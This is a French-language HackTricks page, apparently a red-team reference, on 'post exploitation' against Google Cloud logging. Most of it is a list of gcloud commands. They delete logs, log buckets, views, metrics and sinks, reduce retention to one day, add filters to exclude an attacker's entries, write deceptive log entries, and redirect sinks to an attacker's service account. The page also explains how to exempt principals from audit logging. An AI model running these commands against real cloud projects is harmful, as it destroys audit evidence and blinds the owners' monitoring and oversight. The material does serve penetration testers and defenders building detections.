GCP - Logging Post Exploitation

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFT
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.

Informations de base

Pour plus d'informations, consultez :

pageGCP - Logging Enum

Pour d'autres façons de perturber la surveillance, consultez :

pageGCP - Monitoring Post Exploitation

Journalisation par défaut

Par défaut, vous ne serez pas attrapé simplement pour avoir effectué des actions de lecture. Pour plus d'informations, consultez la section Enumération de la journalisation.

Ajouter un principal excepté

Dans https://console.cloud.google.com/iam-admin/audit/allservices et https://console.cloud.google.com/iam-admin/audit, il est possible d'ajouter des principaux pour ne pas générer de journaux. Un attaquant pourrait abuser de cela pour éviter d'être attrapé.

Lire les journaux - `logging.logEntries.list`

# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json

# Everything from a timestamp
gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json

# Use these options to indicate a different bucket or view to use: --bucket=_Required  --view=_Default

`logging.logs.delete`

# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>

# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR

`logging.buckets.update`

# Set retention period to 1 day (_Required has a fixed one of 400days)

gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1

`logging.buckets.delete`

# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>

`logging.links.delete`

# Delete link
gcloud logging links delete <link-id> --bucket <bucket> --location <location>

`logging.views.delete`

# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket> --location=global

`logging.views.update`

# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"

`logging.logMetrics.update`

# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID

`logging.logMetrics.delete`

# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>

`logging.sinks.delete`

Supprime un ou plusieurs journaux de destination.

# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>

`logging.sinks.update`

# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled

# Createa filter to exclude attackers logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"

# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <sink-name> new-destination

# Change the service account to one withuot permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID

# Remove explusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions

# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!

D'autres façons de soutenir HackTricks :

Si vous voulez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
Obtenez le swag officiel PEASS & HackTricks
Découvrez La Famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts github.

PrécédentGCP - KMS Post Exploitation SuivantGCP - Monitoring Post Exploitation

Dernière mise à jour il y a 2 mois

Informations de base

Journalisation par défaut

Ajouter un principal excepté

Lire les journaux - logging.logEntries.list

logging.logs.delete

logging.buckets.update

logging.buckets.delete

logging.links.delete

logging.views.delete

logging.views.update

logging.logMetrics.update

logging.logMetrics.delete

logging.sinks.delete

logging.sinks.update